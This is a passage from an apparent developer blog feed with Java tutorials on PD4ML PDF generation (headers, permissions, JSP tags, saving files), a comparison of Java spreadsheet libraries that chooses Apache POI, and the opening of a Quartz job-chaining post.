<span id="cb4-20"><a aria-hidden="true" href="#cb4-20" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setPagesToSkip</span><span class="op">(</span> <span class="dv">1</span> <span class="op">);</span></span>
<span id="cb4-21"><a aria-hidden="true" href="#cb4-21" tabindex="-1"></a><span class="co">//defines a number of pages from the document beginning, that should not be marked with the header or footer info</span></span>
<span id="cb4-22"><a aria-hidden="true" href="#cb4-22" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setTitleTemplate</span><span class="op">(</span> <span class="st">"[ $[title] ]"</span> <span class="op">);</span></span>
<span id="cb4-23"><a aria-hidden="true" href="#cb4-23" tabindex="-1"></a><span class="co">//Already explained above</span></span>
<span id="cb4-24"><a aria-hidden="true" href="#cb4-24" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setPageNumberTemplate</span><span class="op">(</span> <span class="st">"page: $[page]"</span> <span class="op">);</span></span>
<span id="cb4-25"><a aria-hidden="true" href="#cb4-25" tabindex="-1"></a><span class="co">//Already explained above</span></span>
<span id="cb4-26"><a aria-hidden="true" href="#cb4-26" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setTitleAlignment</span><span class="op">(</span> PD4PageMark<span class="op">.</span><span class="fu">RIGHT_ALIGN</span> <span class="op">);</span></span>
<span id="cb4-27"><a aria-hidden="true" href="#cb4-27" tabindex="-1"></a><span class="co">//Already explained above</span></span>
<span id="cb4-28"><a aria-hidden="true" href="#cb4-28" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setPageNumberAlignment</span><span class="op">(</span> PD4PageMark<span class="op">.</span><span class="fu">LEFT_ALIGN</span> <span class="op">);</span></span>
<span id="cb4-29"><a aria-hidden="true" href="#cb4-29" tabindex="-1"></a><span class="co">//Already explained above</span></span>
<span id="cb4-30"><a aria-hidden="true" href="#cb4-30" tabindex="-1"></a></span>
<span id="cb4-31"><a aria-hidden="true" href="#cb4-31" tabindex="-1"></a>pd4ml<span class="op">.</span><span class="fu">setPageHeader</span><span class="op">(</span> header <span class="op">);</span></span>
<span id="cb4-32"><a aria-hidden="true" href="#cb4-32" tabindex="-1"></a>pd4ml<span class="op">.</span><span class="fu">setPageFooter</span><span class="op">(</span> footer <span class="op">);</span></span></code></pre></div>
<h4 id="protecting-pdf-documents">Protecting PDF documents</h4>
<p>A PDF document can be encrypted to protect its contents from
unauthorized access. PD4ML supports PDF access permissions concept and
allows a password to be specified for a document. If any passwords or
access restrictions are specified with PD4ML.setPermissions (), the
document is encrypted, and the permissions and information required to
validate the passwords are stored to the resulting document.</p>
<p>The possible restrictions are:</p>
<ol type="1">
<li>Modifying the document’s contents</li>
<li>Copying or otherwise extracting text and graphics from the
document</li>
<li>Adding or modifying text annotations</li>
<li>Printing the document</li>
</ol>
<p>The various types of pre-set Permissions available in the API
are:</p>
<ul>
<li>AllowAssembly</li>
<li>AllowContentExtraction</li>
<li>AllowCopy</li>
<li>AllowDegradedPrint</li>
<li>AllowModify</li>
<li>AllowPrint</li>
</ul>
<p>The PDF document produced by PD4ML can be protected with 40-bit or
128-bit encryption using the various Permission levels given above.</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a><span class="bu">String</span> password <span class="op">=</span> <span class="st">"empty"</span><span class="op">;</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a><span class="dt">boolean</span> strongEncryption <span class="op">=</span> <span class="kw">true</span><span class="op">;</span></span>
<span id="cb5-3"><a aria-hidden="true" href="#cb5-3" tabindex="-1"></a><span class="dt">int</span> permissions <span class="op">=</span> PD4Constants<span class="op">.</span><span class="fu">AllowPrint</span> <span class="op">|</span> PD4Constants<span class="op">.</span><span class="fu">AllowCopy</span><span class="op">;</span></span>
<span id="cb5-4"><a aria-hidden="true" href="#cb5-4" tabindex="-1"></a>pd4ml<span class="op">.</span><span class="fu">setPermissions</span><span class="op">(</span> password<span class="op">,</span> permissions<span class="op">,</span> strongEncryption <span class="op">);</span></span></code></pre></div>
<p>Some of the other salient Features that are available with PD4ML
are:</p>
<ul>
<li>Converting HTML headings or named anchors to PDF bookmarks</li>
<li>Named anchors</li>
<li>Inserting page breaks</li>
<li>generating and sending PDF by email</li>
</ul>
<h3 id="using-pd4ml-in-web-applications-for-online-pdf-generation">Using
PD4ML in Web applications for online PDF generation</h3>
<p>PD4ML can be used in Web applications for online PDF generation from
HTML, JSP and Servlet templates. A simple example is given below:</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a><span class="dt"><</span><span class="kw">taglib</span><span class="ot"> uri</span><span class="op">=</span><span class="st">"http://pd4ml.com/tlds/pd4ml/2.5"</span><span class="ot"> prefix</span><span class="op">=</span><span class="st">"pd4ml"</span><span class="dt">></span></span>
<span id="cb6-2"><a aria-hidden="true" href="#cb6-2" tabindex="-1"></a><span class="dt"><</span><span class="kw">page</span><span class="ot"> contentType</span><span class="op">=</span><span class="st">"text/html; charset=UTF-8"</span><span class="dt">></span></span>
<span id="cb6-3"><a aria-hidden="true" href="#cb6-3" tabindex="-1"></a></span>
<span id="cb6-4"><a aria-hidden="true" href="#cb6-4" tabindex="-1"></a><span class="dt"><</span><span class="kw">pd4ml:transform</span></span>
<span id="cb6-5"><a aria-hidden="true" href="#cb6-5" tabindex="-1"></a><span class="ot"> screenWidth</span><span class="op">=</span><span class="st">"400"</span></span>
<span id="cb6-6"><a aria-hidden="true" href="#cb6-6" tabindex="-1"></a><span class="ot"> pageFormat</span><span class="op">=</span><span class="st">"A5"</span></span>
<span id="cb6-7"><a aria-hidden="true" href="#cb6-7" tabindex="-1"></a><span class="ot"> pageOrientation</span><span class="op">=</span><span class="st">"landscape"</span></span>
<span id="cb6-8"><a aria-hidden="true" href="#cb6-8" tabindex="-1"></a><span class="ot"> pageInsets</span><span class="op">=</span><span class="st">"100,100,100,100,points"</span></span>
<span id="cb6-9"><a aria-hidden="true" href="#cb6-9" tabindex="-1"></a><span class="ot"> enableImageSplit</span><span class="op">=</span><span class="st">"false"</span><span class="dt">></span></span>
<span id="cb6-10"><a aria-hidden="true" href="#cb6-10" tabindex="-1"></a></span>
<span id="cb6-11"><a aria-hidden="true" href="#cb6-11" tabindex="-1"></a> <span class="dt"><</span><span class="kw">html</span><span class="dt">></span></span>
<span id="cb6-12"><a aria-hidden="true" href="#cb6-12" tabindex="-1"></a> <span class="dt"><</span><span class="kw">head</span><span class="dt">></span></span>
<span id="cb6-13"><a aria-hidden="true" href="#cb6-13" tabindex="-1"></a> <span class="dt"><</span><span class="kw">title</span><span class="dt">></span>pd4ml test<span class="dt"></</span><span class="kw">title</span><span class="dt">></span></span>
<span id="cb6-14"><a aria-hidden="true" href="#cb6-14" tabindex="-1"></a> <span class="dt"><</span><span class="kw">style</span><span class="ot"> type</span><span class="op">=</span><span class="st">"text/css"</span><span class="dt">></span></span>
<span id="cb6-15"><a aria-hidden="true" href="#cb6-15" tabindex="-1"></a> body {</span>
<span id="cb6-16"><a aria-hidden="true" href="#cb6-16" tabindex="-1"></a> <span class="kw">color</span><span class="ch">:</span> <span class="cn">red</span><span class="op">;</span></span>
<span id="cb6-17"><a aria-hidden="true" href="#cb6-17" tabindex="-1"></a> <span class="kw">background-color</span><span class="ch">:</span> <span class="cn">#FFFFFF</span><span class="op">;</span></span>
<span id="cb6-18"><a aria-hidden="true" href="#cb6-18" tabindex="-1"></a> <span class="kw">font-family</span><span class="ch">:</span> <span class="dv">Tahoma</span><span class="op">,</span> <span class="st">"Sans-Serif"</span><span class="op">;</span></span>
<span id="cb6-19"><a aria-hidden="true" href="#cb6-19" tabindex="-1"></a> <span class="kw">font-size</span><span class="ch">:</span> <span class="dv">10</span><span class="dt">pt</span><span class="op">;</span></span>
<span id="cb6-20"><a aria-hidden="true" href="#cb6-20" tabindex="-1"></a> }</span>
<span id="cb6-21"><a aria-hidden="true" href="#cb6-21" tabindex="-1"></a> <span class="dt"></</span><span class="kw">style</span><span class="dt">></span></span>
<span id="cb6-22"><a aria-hidden="true" href="#cb6-22" tabindex="-1"></a> <span class="dt"></</span><span class="kw">head</span><span class="dt">></span></span>
<span id="cb6-23"><a aria-hidden="true" href="#cb6-23" tabindex="-1"></a> <span class="dt"><</span><span class="kw">body</span><span class="dt">></span></span>
<span id="cb6-24"><a aria-hidden="true" href="#cb6-24" tabindex="-1"></a> <span class="dt"><</span><span class="kw">img</span><span class="ot"> src</span><span class="op">=</span><span class="st">"images/logos.gif"</span><span class="ot"> width</span><span class="op">=</span><span class="st">"125"</span><span class="ot"> height</span><span class="op">=</span><span class="st">"74"</span><span class="dt">></span></span>
<span id="cb6-25"><a aria-hidden="true" href="#cb6-25" tabindex="-1"></a> <span class="dt"><</span><span class="kw">p</span><span class="dt">></span></span>
<span id="cb6-26"><a aria-hidden="true" href="#cb6-26" tabindex="-1"></a> Hello, World!</span>
<span id="cb6-27"><a aria-hidden="true" href="#cb6-27" tabindex="-1"></a> <span class="dt"><</span><span class="kw">pd4ml:page.break</span><span class="dt">/></span></span>
<span id="cb6-28"><a aria-hidden="true" href="#cb6-28" tabindex="-1"></a> <span class="dt"><</span><span class="kw">table</span><span class="ot"> width</span><span class="op">=</span><span class="st">"100%"</span><span class="ot"> style</span><span class="op">=</span><span class="st">"background-color: #f4f4f4; color: #000000"</span><span class="dt">></span></span>
<span id="cb6-29"><a aria-hidden="true" href="#cb6-29" tabindex="-1"></a> <span class="dt"><</span><span class="kw">tr</span><span class="dt">></span></span>
<span id="cb6-30"><a aria-hidden="true" href="#cb6-30" tabindex="-1"></a> <span class="dt"><</span><span class="kw">td</span><span class="dt">></span></span>
<span id="cb6-31"><a aria-hidden="true" href="#cb6-31" tabindex="-1"></a> Hello, New Page!</span>
<span id="cb6-32"><a aria-hidden="true" href="#cb6-32" tabindex="-1"></a> <span class="dt"></</span><span class="kw">td</span><span class="dt">></span></span>
<span id="cb6-33"><a aria-hidden="true" href="#cb6-33" tabindex="-1"></a> <span class="dt"></</span><span class="kw">tr</span><span class="dt">></span></span>
<span id="cb6-34"><a aria-hidden="true" href="#cb6-34" tabindex="-1"></a> <span class="dt"></</span><span class="kw">table</span><span class="dt">></span></span>
<span id="cb6-35"><a aria-hidden="true" href="#cb6-35" tabindex="-1"></a> <span class="dt"></</span><span class="kw">body</span><span class="dt">></span></span>
<span id="cb6-36"><a aria-hidden="true" href="#cb6-36" tabindex="-1"></a> <span class="dt"></</span><span class="kw">html</span><span class="dt">></span></span>
<span id="cb6-37"><a aria-hidden="true" href="#cb6-37" tabindex="-1"></a><span class="dt"></</span><span class="kw">pd4ml:transform</span><span class="dt">></span></span></code></pre></div>
<p>In order to get a PDF output, we need to surround the HTML or JSP
with <pd4ml:transform> tags or refer to the markup from an external
PD4ML-enabled JSP or Servlets.</pd4ml:transform></p>
<ol type="1">
<li>PD4ML JSP taglib declaration and opening transform tag. JSP content
surrounded with <code><pd4ml:transform></code> and
<code></pd4ml:transform></code> tags is passed to the PD4ML
converter.</li>
<li>Image should be referenced with relative path. Absolute URLs, like
<code>src="http://myserver:80/path/to/img.gif"</code> are allowed as
well, but <code>src="/path/to/img.gif"</code> is not allowed.</li>
<li>The directive forces PD4ML converter to insert a page break to the
output PDF.</li>
<li>Closing of the transformation tag. Any content that appears after
the tag is ignored.</li>
</ol>
<p>####Defining PDF document footer (or header) with JSP custom tag The
header and/or footer for the PDF can be declared in the jsp in the
following fashion.</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a><span class="dt"><</span><span class="kw">pd4ml:footer</span></span>
<span id="cb7-2"><a aria-hidden="true" href="#cb7-2" tabindex="-1"></a><span class="ot"> titleTemplate</span><span class="op">=</span><span class="st">"[${title}]"</span></span>
<span id="cb7-3"><a aria-hidden="true" href="#cb7-3" tabindex="-1"></a><span class="ot"> pageNumberTemplate</span><span class="op">=</span><span class="st">"page ${page}"</span></span>
<span id="cb7-4"><a aria-hidden="true" href="#cb7-4" tabindex="-1"></a><span class="ot"> titleAlignment</span><span class="op">=</span><span class="st">"left"</span></span>
<span id="cb7-5"><a aria-hidden="true" href="#cb7-5" tabindex="-1"></a><span class="ot"> pageNumberAlignment</span><span class="op">=</span><span class="st">"right"</span></span>
<span id="cb7-6"><a aria-hidden="true" href="#cb7-6" tabindex="-1"></a><span class="ot"> color</span><span class="op">=</span><span class="st">"#008000"</span></span>
<span id="cb7-7"><a aria-hidden="true" href="#cb7-7" tabindex="-1"></a><span class="ot"> initialPageNumber</span><span class="op">=</span><span class="st">"1"</span></span>
<span id="cb7-8"><a aria-hidden="true" href="#cb7-8" tabindex="-1"></a><span class="ot"> pagesToSkip</span><span class="op">=</span><span class="st">"1"</span></span>
<span id="cb7-9"><a aria-hidden="true" href="#cb7-9" tabindex="-1"></a><span class="ot"> fontSize</span><span class="op">=</span><span class="st">"14"</span></span>
<span id="cb7-10"><a aria-hidden="true" href="#cb7-10" tabindex="-1"></a><span class="ot"> areaHeight</span><span class="op">=</span><span class="st">"18"</span><span class="dt">/></span></span></code></pre></div>
<h4 id="description">Description</h4>
<ol type="1">
<li>Title template definition. A string that can optionally contain
placeholders ${title} for a title value taken from HTML’s TITLE tag,
${page} for a page counter value.</li>
<li>Page number template definition. A string with placeholder ${page}
for a page counter value.</li>
<li>The attribute initializes internal page counter with the given
value.</li>
<li>The attribute defines, that 1 page should not contain footer
information.</li>
<li>Footer area height in points.</li>
</ol>
<h4 id="adding-dynamic-data">Adding Dynamic data</h4>
<p>Dynamic data like data from session or scriplets can be used in the
PDF generation. A Simple Example is given below.</p>
<pre><code> <% String template = getFormattedDate() + ", page ${page} "; %>
<pd4ml:footer
pageNumberTemplate="<%=template%>"
.......
/></code></pre>
<p>This means that the entire form generation for Presentation
Frameworks like Struts etc., can be used just like a normal JSP. This
provides a nice demarcation and seamless integration of the presentation
(Format/Layout) of the PDF document and the business behind the
generation</p>
<p>####Temporary saving generated PDF to hard drive With
<code><pd4ml:savefile></code> tag you have possibility to store
just generated PDF to hard drive and redirect user’s browser to read the
PDF as static resource or to redirect the request to another URL for PDF
post-processing. The tag should be nested within
<code><pd4ml:transform></code> and should not have a body.There
are two ways of generating the PDF and redirecting the browser.</p>
<p>####Routing the browser to the PDF generated Once the PDF is
generated the user can be directed to the generated PDF using the
following piece of code.</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a><span class="dt"><</span><span class="kw">pd4ml:savefile</span></span>
<span id="cb9-2"><a aria-hidden="true" href="#cb9-2" tabindex="-1"></a><span class="ot"> uri</span><span class="op">=</span><span class="st">"/WEB/savefile/saved/"</span></span>
<span id="cb9-3"><a aria-hidden="true" href="#cb9-3" tabindex="-1"></a><span class="ot"> dir</span><span class="op">=</span><span class="st">"D:/spool/generated_pdfs"</span></span>
<span id="cb9-4"><a aria-hidden="true" href="#cb9-4" tabindex="-1"></a><span class="ot"> redirect</span><span class="op">=</span><span class="st">"pdf"</span></span>
<span id="cb9-5"><a aria-hidden="true" href="#cb9-5" tabindex="-1"></a><span class="ot"> debug</span><span class="op">=</span><span class="st">"false"</span><span class="dt">/></span></span></code></pre></div>
<p>The tag above forces PD4ML to save the generated PDF to
D:/spool/generated_pdfs with an autogenerated name.It is expected, that
local directory D:/spool/generated_pdfs corresponds to URL
<code>http://yourserver.com/WEB/savefile/saved/</code> (as given in
“uri” attribute)</p>
<p>After generation PD4ML will send to client’s browser a redirect
command with URL like that:
<code>http://yourserver.com/WEB/savefile/saved/generated_name.pdf</code>
where,</p>
<p><code>http://yourserver.com</code> - Context path</p>
<p><code>/WEB/savefile/saved</code> - URI given</p>
<p><code>generated_name.pdf</code> - Auto generated file Name</p>
<h4 id="routing-the-browser-to-the-next-page">Routing the browser to the
next page</h4>
<p>However if the browser needs to be redirected to the next page
instead of the PDF generated, it can be done in the following way.</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a><span class="dt"><</span><span class="kw">pd4ml:savefile</span></span>
<span id="cb10-2"><a aria-hidden="true" href="#cb10-2" tabindex="-1"></a><span class="ot"> dir</span><span class="op">=</span><span class="st">"D:/spool/generated_pdfs"</span></span>
<span id="cb10-3"><a aria-hidden="true" href="#cb10-3" tabindex="-1"></a><span class="ot"> redirect</span><span class="op">=</span><span class="st">"/mywebapp/send_pdf_by_email.jsp"</span></span>
<span id="cb10-4"><a aria-hidden="true" href="#cb10-4" tabindex="-1"></a><span class="ot"> debug</span><span class="op">=</span><span class="st">"false"</span><span class="dt">/></span></span></code></pre></div>
<p>The tag above forces PD4ML to save the generated PDF to
D:/spool/generated_pdfs with an auto generated name. After that it
forwards to /mywebapp/send_pdf_by_email.jsp with a REQUEST parameter
filename=<code><pdfname></code>. So send_pdf_by_email.jsp can read
file name using,</p>
<div class="sourceCode" id="cb11"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb11-1"><a aria-hidden="true" href="#cb11-1" tabindex="-1"></a><span class="bu">String</span> fileName <span class="op">=</span> request<span class="op">.</span><span class="fu">getParameter</span><span class="op">(</span><span class="st">"filename"</span><span class="op">);</span></span>
<span id="cb11-2"><a aria-hidden="true" href="#cb11-2" tabindex="-1"></a><span class="co">//Building the full path of the PDF generated</span></span>
<span id="cb11-3"><a aria-hidden="true" href="#cb11-3" tabindex="-1"></a><span class="bu">String</span> path <span class="op">=</span> <span class="st">"D:/spool/generated_pdfs"</span> <span class="op">+</span> <span class="st">"/"</span> <span class="op">+</span> fileName<span class="op">;</span></span></code></pre></div>
<p>Hence that JSP can read the just-generated PDF file and and perform
post-processing or any other actions (like E-mail or File-Upload).</p>
<p>In both cases above you can predefine PDF file name with “name”
attribute. If a file with the name is already exists in
D:/spool/generated_pdfs, than the new file name is appended with an
auto-incremented numeric value.</p>
<h3 id="instructions-for-installation">Instructions for
Installation</h3>
<p>PD4ML is intended to be used with JDK1.3.1 and above .For deploying
PD4ML as either Console application and for online generation, use the
following jars available at the PD4ML site (Given in the references) •
pd4ml.jar • pd4ml_tl.jar(for the tag library)</p>
<h4 id="professional-version-features">Professional Version
Features</h4>
<p>Apart from the various features discussed above, the licensed
professional version includes lots of additional features such as:</p>
<ul>
<li>TTF embedding</li>
<li>Configuring Fonts directory</li>
<li>Embedding fonts to PDF from Java API</li>
<li>Embedding fonts to PDF from JSP</li>
<li>Watermark images</li>
<li>Table of contents</li>
<li>General notes</li>
</ul>
<h4 id="other-libraries">Other libraries</h4>
<p>Few other libraries that are available for PDF generation are <a href="http://xmlgraphics.apache.org/fop/">Apache FOP</a> and <a href="http://itextpdf.com/functionality">iText</a></p>
<p><strong>Apache FOP</strong></p>
<blockquote>
<p>Apache FOP (Formatting Objects Processor) is a print formatter driven
by XSL formatting objects (XSL-FO) and an output independent formatter.
It is a Java application that reads a formatting object (FO) tree and
renders the resulting pages to a specified output. Output formats
currently supported include PDF, PS, PCL, AFP, XML (area tree
representation), Print, AWT and PNG, and to a lesser extent, RTF and
TXT. The primary output target is PDF.</p>
</blockquote>
<p><strong>iText</strong> > iText is an open source library that
allows you to create and manipulate PDF documents. It enables developers
looking to enhance web and other applications with dynamic PDF document
generation and/or manipulation.” > - http://itextpdf.com/</p>
<h4 id="references">References</h4>
<ul>
<li><a class="uri" href="http://pd4ml.com/api/index.html">http://pd4ml.com/api/index.html</a></li>
<li><a class="uri" href="http://pd4ml.com/index.htm">http://pd4ml.com/index.htm</a></li>
</ul>Spreadsheet generation using Java libraries2009-09-23T00:00:00-07:002009-09-23T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2009-09-23:/posts/spreadsheet-generation-using-java-libraries.htmlIn a recent working session, some of the best practices for a secure Android application development were discussed. Following were some of the important aspects of the discussion. Other the usual standards of securing the APK and securing the server-side components, some of the development and secure coding practices are listed in this post.<h3 id="introduction">Introduction</h3>
<p>Web Asset Tracker (WATr) is a web application which was mainly used
to maintain various asset information using a RDBMS database. There rose
a specific requirement where the application needs to render the data in
a downloadable spreadsheet. The following post documents the comparison
of leading industry frameworks for creating MS-Excel Spreadsheets using
Java. ### Purpose The purpose of this document is to list out the usage
and pros/cons of the following Excel Java APIs: 1. Apache POI 2. Java
Excel API [JXL] 3. OpenXLS [Product of ExtenXLS]</p>
<h3 id="scope">Scope</h3>
<p>For comparison of the JS frameworks, the following list of criteria
were used</p>
<p>The API should have the ability</p>
<ol type="1">
<li>to read existing Spreadsheets in MS-Excel 97, 2000, XP, 2003 and
2007 formats</li>
<li>to read existing Spreadsheets in ODS [OpenOffice.org Calc
Spreadsheet] formats</li>
<li>provide interoperability between various formats/versions</li>
<li>to edit existing Spreadsheets in the above mentioned formats</li>
<li>to create new spreadsheets in the above mentioned formats</li>
<li>to preserve and create formula and functions on various
worksheets</li>
<li>to manipulate multiple worksheets within a workbook</li>
<li>to manipulate, create and edit chart information</li>
<li>to freeze and split panes</li>
<li>to format cells,cell patterns, fonts and borders</li>
<li>for row and column sizing, formatting, auto-sizing, insertion and
deletion</li>
<li>for cell validations and named ranges</li>
<li>for row and column grouping and collapsing</li>
<li>to draw shapes using the microsoft office drawing tools</li>
<li>to add cell comments</li>
<li>to define printable formats and printing headers/footers</li>
<li>to add embeddable objects</li>
</ol>
<p>The API should also possess 1. Matured Documentation, Tutorials and
Examples 2. Many adaptations 3. Active development and community
support</p>
<h4 id="apache-poi">Apache POI</h4>
<blockquote>
<p>Apache POI, a project run by the Apache Software Foundation, and
previously a sub-project of the Jakarta Project, provides pure Java
libraries for reading and writing files in Microsoft Office formats,
such as Word, PowerPoint and Excel. The name was originally an acronym
for “Poor Obfuscation Implementation”, referring humorously to the fact
that the file formats seemed to be deliberately obfuscated, but poorly,
since they were successfully reverse-engineered. This explanation - and
those of the similar names for the various sub-projects - were removed
from the official web-pages in order to better market the tools to
businesses who would not consider such humour appropriate. The POI
project is the master project for developing pure Java ports of file
formats based on Microsoft’s OLE 2 Compound Document Format. OLE 2
Compound Document Format is used by Microsoft Office Documents, as well
as by programs using MFC property sets to serialize their document
objects. - Wikipedia</p>
</blockquote>
<p>The various components of the Apache POI API are:</p>
<ol type="1">
<li>POIFS is the set of APIs for reading and writing OLE 2 Compound
Document Formats using (only) Java.</li>
<li>HSSF and XSSF are the set of APIs for reading and writing Microsoft
Excel 97-2007 and OOXML spreadsheets using (only) Java.</li>
<li>HWPF is the set of APIs for reading and writing Microsoft Word
97(-XP) documents using (only) Java.</li>
<li>HSLF is the set of APIs for reading and writing Microsoft PowerPoint
97(-XP) documents using (only) Java.</li>
<li>HPSF is the set of APIs for reading property sets using (only)
Java.</li>
</ol>
<h4 id="java-excel-api">Java Excel API</h4>
<blockquote>
<p>Java Excel API is a mature, open source java API enabling developers
to read, write, and modifiy Excel spreadsheets dynamically. Now java
developers can read Excel spreadsheets, modify them with a convenient
and simple API, and write the changes to any output stream (e.g. disk,
HTTP, database, or any socket). - Wikipedia</p>
</blockquote>
<p>Some of the available features are: 1. Reads data from Excel 95, 97,
2000, XP, and 2003 workbooks 2. Reads and writes formulas (Excel 97 and
later only) 3. Generates spreadsheets in Excel 2000 format 4. Supports
font, number and date formatting 5. Supports shading, bordering, and
coloring of cells 6. Modifies existing worksheets 7. Supports copying of
charts 8. Supports insertion and copying of images into spreadsheets 9.
Supports logging with Jakarta Commons Logging, log4j, JDK 1.4 Logger,
etc</p>
<h4 id="limitations">Limitations</h4>
<ol type="1">
<li>JExcelApi does not generate or chart, graph or macro information.
This information is however preserved when spreadsheets are copied</li>
<li>When adding images to a sheet, only PNG image formats are
supported</li>
<li>jexcel fails fatally when encountering invalid formulas, so parsing
client supplied spreadsheets might be a problem</li>
<li>Poor Documentation for any of the advanced features like validation
lists, column and cell formatting</li>
</ol>
<h4 id="openxls-api">OpenXLS API</h4>
<p>OpenXLS is the open-source version of ExtenXLS (commercial Java
SDK)</p>
<p>Some of the available features are:</p>
<ol type="1">
<li>Compatible with Excel ’97-2003 file formats</li>
<li>Control over charts, formulas, and formatting from Java</li>
<li>Based on robust ExtenXLS 6 Codebase</li>
<li>Drop-in upgradability to ExtenXLS supported versions</li>
<li>Good documentation, user guide, and sample code gets you up to speed
fast</li>
<li>Insert, size, and position JPG, GIF, and PNG images in your
Spreadsheet files</li>
<li>Control over spreadsheet formatting</li>
<li>Preserves Charts, PivotTables</li>
<li>Preservation of VB macros (NOTE: VB runtime execution not
supported)</li>
<li>200+ Formula Functions Supported</li>
<li>Create and work with Named Ranges</li>
<li>Supports Merged Cells</li>
<li>Convert Spreadsheets to XML and vice-versa</li>
</ol>
<h4 id="limitations-1">Limitations</h4>
<ol type="1">
<li>Features are very less when compared with its commerical
counter-part.</li>
<li>Support is not available either through an active community or the
organization</li>
<li>Functions mostly like a spring board to use the commerical
version</li>
<li>Does not support Excel 2007</li>
<li>Does not support Open Office Spreadsheet format</li>
</ol>
<h4 id="application-integration">Application Integration</h4>
<p><strong>Where we are trying to fit in this framework</strong></p>
<p>A Java Excel API should * should provide us with well documented and
mature API * hould provide us with extension points for providing our
own customizations</p>
<p><strong>How it is aligned with our current requirements</strong></p>
<p>A Java Excel API should * Provide us with ability to format Excel
sheets * Validation rules for cells/columns * Formula validation and
insertion</p>
<p><strong>Is it going to be one-off (or) continued usage?</strong></p>
<p>A Java Excel API should be such that * It can added as a plugin to
the framework * It makes the export / import functionality
implementation seamless * It has the capability to render images, charts
etc.,</p>
<h4 id="inferences">Inferences</h4>
<p>The inferences gained from performing this comparison:</p>
<ol type="1">
<li>JXL can be used for faster rendering, however will fail in terms of
huge data sets or failed formulae</li>
<li>OpenXLS acts just as a springboard to its commerical counterpart and
has limited functionality</li>
<li>Apache POI has a matured and active community support with rapid
releases, good documentation and lots of features</li>
<li>Apache POI also has functionalities for OpenOffice documents which
would help in transforming results in spreadsheet to other formats such
as PDF, Word or PPT</li>
</ol>
<p>With these criteria in mind and based on the scope provided,
<strong>Apache POI</strong> was chosen to be integrated within the
framework.</p>
<p><em>Note: This is based upon reading the available documentation,
limited user experience and discussion forums</em></p>
<h4 id="references">References</h4>
<ul>
<li>http://poi.apache.org/</li>
<li>http://poi.apache.org/spreadsheet/quick-guide.html</li>
<li>https://olex.openlogic.com/packages/poi</li>
<li>http://poi.apache.org/news.html</li>
<li>http://jexcelapi.sourceforge.net/</li>
<li>https://olex.openlogic.com/packages/jexcel-api</li>
<li>http://www.extentech.com/estore/product_features.jsp?product_group_id=228</li>
<li>http://sourceforge.net/projects/openxls/</li>
</ul>Job chaining using Quartz2009-03-31T00:00:00-07:002009-03-31T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2009-03-31:/posts/job-chaining-using-quartz.htmlThis post is about how we used Quartz library to chain jobs rather than scheduling for indeterminate running time. This post explains the development of the Job schedule and the code changes required.<h3 id="project-usage">Project Usage</h3>
<p>Our Project had the requirement of reading a set of records from a
table which acts as a queue and sends the pending mails. This reading
/sending of mails has to happen every five minutes. However, since the
SMTP server needs to address online mailing at times, this job may run
more than the given five minutes. Also, if the number of records in the
table is high, the Job exceeds the expected time of completion of five
minutes. Hence it was decided to “chain” the jobs with a five minute
delay.</p>
<h3 id="introduction-to-quartz">Introduction to Quartz</h3>
<p>Quartz is an open source job scheduling framework that provides
simple but powerful mechanisms for job scheduling in Java applications.
Quartz allows developers to schedule jobs by time interval or by time of
day. It implements many-to-many relationships for jobs and triggers and
can associate multiple jobs with different triggers. Applications that
incorporate Quartz can reuse jobs from different events and also group
multiple jobs for a single event. While you can configure Quartz through
a property file (in which you can specify a data source for JDBC
transactions, global job and/or trigger listeners, plug-ins, thread
pools, and more) it is not at all integrated with the application
server’s context or references.</p>
<h3 id="jobs-and-triggers">Jobs and triggers</h3>
<p>The two fundamental units of Quartz’s scheduling package are jobs and
triggers. A job is an executable task that can be scheduled, while a
trigger provides a schedule for a job. While these two entities could
easily have been combined, their separation in Quartz is both
intentional and beneficial. By keeping the work to be performed separate
from its scheduling, Quartz allows you to change the scheduled trigger
for a job without losing the job itself, or the context around it. Also,
any singular job can have many triggers associated with it.</p>
<h3 id="simple-job-example">Simple Job Example</h3>
<p>An example of a Quartz job is given below. This class overrides the
execute () (JobExecutionContext context) method with a very simple
output statement. This method can contain any code that constitutes the
job to be executed</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a>SimpleQuartzJob<span class="op">.</span><span class="fu">java</span></span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a></span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a> <span class="kw">import</span> <span class="im">java</span><span class="op">.</span><span class="im">util</span><span class="op">.</span><span class="im">Date</span><span class="op">;</span></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">Job</span><span class="op">;</span></span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">JobExecutionContext</span><span class="op">;</span></span>
